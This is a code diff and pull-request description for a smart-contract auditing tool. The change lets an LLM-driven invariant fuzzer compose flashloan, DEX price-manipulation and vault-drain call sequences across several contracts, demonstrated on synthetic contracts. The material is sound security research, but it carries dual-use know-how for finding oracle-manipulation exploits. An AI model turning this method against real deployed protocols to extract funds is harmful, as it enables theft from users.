+#                            who moves price via the dex and checks the TARGET's solvency after the cross-
+#                            contract sequence. The `target` role still also sets FORK_TARGET (FM1 compat).
+#                        Absent any role beyond `target` => FM1 behaviour byte-identical. Optional; "" leaves it
+#                        to the test. A --fork-target does NOT require --fork-url (the context contracts may be
+#                        deployed locally by the test — composability is orthogonal to fork; the two COMPOSE).
 #   --out <dir>          Output dir for the run + report (default: ./invariant-out).
 #   --pattern-store <dir>  Int M3 (#1037): a PERSISTENT pattern-DAG store reused ACROSS runs. When set, the
 #                        winning-invariant patterns the prover PERSISTS on a FINDING (`invpat:*` memos) are
@@ -63,6 +74,9 @@ AGENTIS="agentis"
 REPO="" ; TARGET="" ; CLASS="" ; FIXTURE="" ; CODE="" ; MATCH="invariant"
 BACKEND="flat-cyborg" ; MODEL="" ; RUNS="" ; DEPTH="" ; SEED="" ; OUT="$PWD/invariant-out" ; PATTERN_STORE=""
 FORK_URL="" ; FORK_BLOCK="" ; FORK_TARGET=""
+# FM2 (#1041): the composability context set — one `--fork-target '<role>=<addr>'` per array slot. A bare
+# `--fork-target <addr>` (FM1 shorthand, no '=') is normalised to a `target=<addr>` slot below.
+FORK_TARGET_SPECS=()
 
 need() { [ "$1" -ge 2 ] || { echo "run-invariant-hunt.sh: missing value for the preceding flag" >&2; exit 2; }; }
 while [ $# -gt 0 ]; do
@@ -80,7 +94,7 @@ while [ $# -gt 0 ]; do
     --seed) need "$#"; SEED="$2"; shift 2 ;;
     --fork-url) need "$#"; FORK_URL="$2"; shift 2 ;;
     --fork-block) need "$#"; FORK_BLOCK="$2"; shift 2 ;;
-    --fork-target) need "$#"; FORK_TARGET="$2"; shift 2 ;;
+    --fork-target) need "$#"; FORK_TARGET_SPECS+=("$2"); shift 2 ;;
     --out) need "$#"; OUT="$2"; shift 2 ;;
     --pattern-store) need "$#"; PATTERN_STORE="$2"; shift 2 ;;
     --agentis) need "$#"; AGENTIS="$2"; shift 2 ;;
@@ -97,8 +111,7 @@ for v in "$RUNS" "$DEPTH" "$SEED"; do
   case "$v" in '') ;; *[!0-9]*) echo "run-invariant-hunt.sh: --runs/--depth/--seed must be whole numbers" >&2; exit 2 ;; esac
 done
 # FM1 (#1041): fork-arg shape validation (mirrors the gate's). --fork-url must look like an http(s) URL,
-# --fork-block a whole number requiring --fork-url. --fork-target is a free-form deployed-address label the
-# generated test references (no on-chain validation here — the gate/forge resolve it on the forked state).
+# --fork-block a whole number requiring --fork-url.
 case "$FORK_URL" in
   '') ;;
   http://*|https://*) ;;
@@ -106,7 +119,36 @@ case "$FORK_URL" in
 esac
 case "$FORK_BLOCK" in '') ;; *[!0-9]*) echo "run-invariant-hunt.sh: --fork-block must be a whole number" >&2; exit 2 ;; esac
 [ -z "$FORK_BLOCK" ] || [ -n "$FORK_URL" ] || { echo "run-invariant-hunt.sh: --fork-block requires --fork-url" >&2; exit 2; }
-[ -z "$FORK_TARGET" ] || [ -n "$FORK_URL" ] || { echo "run-invariant-hunt.sh: --fork-target requires --fork-url (a deployed address is meaningless without a fork)" >&2; exit 2; }
+
+# FM2 (#1041): resolve the repeatable --fork-target specs into the FORK_CONTEXT role->address set and the
+# FM1 FORK_TARGET single-address. Each spec is either `<role>=<addr>` (a context role) or a bare `<addr>`
+# (FM1 shorthand, normalised to role `target`). Validate each address (0x + 40 hex) and role ([a-z0-9_]) so a
+# malformed value is a clean usage error here, never an opaque forge failure. A role may not repeat. The
+# encoding exported to the prover is a semicolon-separated `role=addr` list (parse-safe: no metachar in either
+# field after validation). Absent any role beyond `target`, FORK_CONTEXT carries only `target` (or is empty)
+# and the prover's FM1 prompt is byte-identical (the composability extension fires only on >1 role).
+FORK_CONTEXT=""
+fork_ctx_has_role() {  # $1 = role -> 0 if FORK_CONTEXT already carries `<role>=`
+  case ";$FORK_CONTEXT;" in *";$1="*) return 0 ;; *) return 1 ;; esac
+}
+for spec in ${FORK_TARGET_SPECS+"${FORK_TARGET_SPECS[@]}"}; do
+  case "$spec" in
+    *=*) _role="${spec%%=*}"; _addr="${spec#*=}" ;;
+    *)   _role="target"; _addr="$spec" ;;
+  esac
+  case "$_role" in
+    '' ) echo "run-invariant-hunt.sh: --fork-target role must be non-empty (got: $spec)" >&2; exit 2 ;;
+    *[!a-z0-9_]*) echo "run-invariant-hunt.sh: --fork-target role must match [a-z0-9_] (got: $_role)" >&2; exit 2 ;;
+  esac
+  case "$_addr" in
+    0x*) _hex="${_addr#0x}"; case "$_hex" in *[!0-9a-fA-F]*) _bad=1 ;; *) [ "${#_hex}" -eq 40 ] && _bad=0 || _bad=1 ;; esac ;;
+    *) _bad=1 ;;
+  esac
+  [ "${_bad:-1}" -eq 0 ] || { echo "run-invariant-hunt.sh: --fork-target address must be 0x + 40 hex (got: $_addr)" >&2; exit 2; }
+  fork_ctx_has_role "$_role" && { echo "run-invariant-hunt.sh: --fork-target role '$_role' given more than once" >&2; exit 2; }
+  if [ -z "$FORK_CONTEXT" ]; then FORK_CONTEXT="$_role=$_addr"; else FORK_CONTEXT="$FORK_CONTEXT;$_role=$_addr"; fi
+  [ "$_role" = "target" ] && FORK_TARGET="$_addr"
+done
 command -v "$AGENTIS" >/dev/null 2>&1 || [ -x "$AGENTIS" ] || { echo "run-invariant-hunt.sh: agentis binary not found ($AGENTIS)" >&2; exit 3; }
 
 # Resolve operator paths to ABSOLUTE — the colony runs from the rundir (a different cwd) and the exec sandbox
@@ -167,8 +209,9 @@ fi
   echo "trace.level = normal"
   # The prover reads code + the fixture and writes/runs the test through exec sh; pass its whole env contract.
   # FM1 (#1041): FORK_URL/FORK_BLOCK thread the fork into the gate; FORK_TARGET is the deployed address the
-  # generated handler/invariant references against the forked state.
-  echo "exec.env_passthrough = TARGET_FN,TARGET_CLASS,INV_REPO,INV_OUT,INV_MATCH,HANDLER_FIXTURE,CODE_PATH,INV_RUNS,INV_DEPTH,INV_SEED,FORGE_INVARIANT,FORK_URL,FORK_BLOCK,FORK_TARGET"
+  # generated handler/invariant references against the forked state. FM2 (#1041): FORK_CONTEXT carries the
+  # role->address context set so the generation prompt can compose calls across the deployed protocols.
+  echo "exec.env_passthrough = TARGET_FN,TARGET_CLASS,INV_REPO,INV_OUT,INV_MATCH,HANDLER_FIXTURE,CODE_PATH,INV_RUNS,INV_DEPTH,INV_SEED,FORGE_INVARIANT,FORK_URL,FORK_BLOCK,FORK_TARGET,FORK_CONTEXT"
   # A forge invariant run (build + a few hundred fuzzed sequences) far exceeds the 10s default.
   echo "exec.default_timeout_ms = 600000"
   # Each verify is recorded as experience; invariant-prover fitness reweights over targets.
@@ -225,6 +268,7 @@ echo "run-invariant-hunt.sh: generating + stateful-fuzzing $TARGET ($CLASS) ..."
     FORK_URL="$FORK_URL" \
     FORK_BLOCK="$FORK_BLOCK" \
     FORK_TARGET="$FORK_TARGET" \
+    FORK_CONTEXT="$FORK_CONTEXT" \
     FORGE_INVARIANT="$RUN/forge-invariant.sh" \
     "$AGENTIS" go invariant-prover.ag --enable-exec --enable-messaging ) >"$CELL_LOG" 2>&1 || \
     echo "run-invariant-hunt.sh: invariant-prover run failed for '$TARGET' (see $CELL_LOG)" >&2


### PR DESCRIPTION
## What

Part of #1041 (**FM2**). Single-contract invariant fuzzing is structurally blind to the highest-value bug class: **flashloan-funded cross-contract value extraction** (the canonical oracle/price-manipulation exploit). FM2 lets the fuzzer compose call-sequences across the target **and the protocols it interacts with** (a DEX for price moves, a flashloan source, the oracle), so `flashloan → manipulate-A → drain-B` sequences are reachable. Composes with FM1 fork-mode (a real run uses `--fork-url` + multiple `--fork-target` roles).

## How

- **`run-invariant-hunt.sh` / `run-autonomous-hunt.sh`** — `--fork-target` is now repeatable and accepts `<role>=<addr>` (role ∈ {target,dex,flashloan,oracle,…}); a bare `<addr>` stays the FM1 target shorthand. Validates address shape + role charset, rejects duplicate roles, builds `FORK_CONTEXT` (semicolon-separated `role=addr`) and exports it to the prover (autonomous path threads `INV_FORK_CONTEXT` through the coordinator + the `--pattern-store` wrapper). The FM1 "--fork-target requires --fork-url" guard is relaxed (composability roles may be locally deployed) — strictly additive.
- **`auditor/agents/invariant-prover.ag`** — `composable_active()` fires only when the context carries >1 role; `compose_seed()` adds the flashloan-attacker prompt (model an attacker funded by the flashloan source, move price via the dex, span all contracts, deep invariant on the TARGET's solvency — **no free value extraction**). Single-target/empty context ⇒ FM1 prompt byte-identical.
- **`coordinator.ag`** forwards `INV_FORK_CONTEXT` (`shell_escape`d); **`forge-invariant.sh`** accepts+ignores `--fork-context` (a generation hint; the gate auto-discovers `targetContracts()`).
- **`demo-composability.sh`** + docs/README/CHANGELOG.

## Verification (LIVE — forge 1.7.1)

- **`demo-composability.sh` — green**: synthetic `MiniAMM` (constant-product) + `LendingVault` (spot-price oracle bug) + `FlashLender`.
  - **Leg A (composable** — target+dex+flashloan, cross-contract handler) → **FINDING** with the shrunk atomic `flashAndSwap` witness. The break is a **real `stolen != 0` drain** (`"vault drained: attacker extracted free value via cross-contract sequence"`) — not a hard-coded assert; the attacker is flashloan-funded with **zero** external capital, so any kept quote is unambiguously free value.
  - **Leg B (single-contract** — vault-only handler, same budget/seed) → **CLEAN** at full budget (`runs: 256, calls: 16384, reverts: 829`). The vault-only actor can deposit/borrow but **cannot** extract without composing the DEX swap + flashloan — CLEAN by structural unreachability.
  - The **A-FINDING / B-CLEAN split proves composability is the lift, not the budget.**
- **No regression** — green: `demo-fork-hunt.sh`, `demo-invariant-hunt.sh`, `demo-autonomous-hunt.sh`, `demo-candidate-carry.sh`, `demo-pattern-memory.sh`, `demo-dispatch.sh` (sync-guard), `demo-symbolic-orchestrate-live.sh`, `demo-orchestrate.sh`.
- **`colony-lint.sh` → 367 / 0 / 5**.

## Boundary

Verdict = the fuzzer's exit code, never the LLM; the colony NEVER auto-submits. Additive: no extra `--fork-target` role ⇒ FM1/#1035/#1037 byte-identical. Oracle-perturbation depth (FM3) + audit-informed synthesis (FM4) follow.

🤖 Generated with [Claude Code](https://claude.com/claude-code)
